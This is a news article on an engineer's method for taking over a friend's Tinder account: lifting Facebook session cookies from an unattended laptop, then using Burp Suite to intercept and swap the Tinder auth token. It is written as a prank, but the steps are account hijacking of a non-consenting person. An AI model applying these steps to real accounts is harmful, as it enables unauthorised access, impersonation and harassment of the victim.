Easy Tinder prank hack lets you play stupid cupid

Engineer details method for 45-minute romp arranging dates for unwitting mates

7 Reg comments Got Tips?

Software engineer Robert Heaton has detailed simple tricks to fondle your mates' Tinder and Facebook accounts over the festive season.

Friendship is a pre-requisite for the prank that requires cookies to be swiped off an unattended machine and reworked to be absorbed into the iOS Tinder app.

In a detailed post Heaton said Tinder accounts could be hijacked using a little security knowledge and a few minutes of unattended machine time.

"You have discovered that all you need is a little time with his laptop's Facebook session and you can bust into his Tinder account on your phone," Heaton said.

"You can use this small window of opportunity to throw his Facebook session from his laptop onto yours, then continue with the next phase right under his oblivious nose.

"His session is in his browser cookies. You get his Facebook.com cookies, you get his session."

The prank used the Chrome extension EditThisCookie to nab Facebook cookies stored in the Google browser which could then be emailed as JSON serialised cookies. This granted access to the target's Facebook account as long as it remained logged in.

"Steve comes back, enormous sandwich in hand. But it's too late. You're in."

Tinder cupids keen to defeat the attack should drop the sandwich, grab a copy of the Burp Suite web app security tool, install the SSL certificate on their phone and a proxy on their computer.

From there, Heaton advises punters to delete their iOS Facebook app and then use that social network to log in to Tinder in a feat described as "man-in-the-middling yourself".

This generated a HTTP GET request captured by Burp Suite. The URL was then copied into the browser previously logged into Facebook using the pinched cookie which would ask if the victim would like to authorise their Tinder account.

A HTTP POST request from that authentication would be then nabbed by Burp Suite which could be examined to prise open the encrypted authentication token.

That token could then using Burp Suite's intercept mode be inserted into the returning HTTP request from the Tinder-Facebook login attempt made on the iOS device, granting access to the victim's Tinder account.

"You did it. Tears of joy and relief streaming down your face, you change all of his photos to pictures of Gary Busey and start educating all of his matches about his deleterious personal hygiene."

Pranksters have up to 45 minutes to enjoy their festive furtive free-for-all before being promptly and inexplicably punted by Facebook and Tinder. ®


Biting the hand that feeds IT © 1998–2020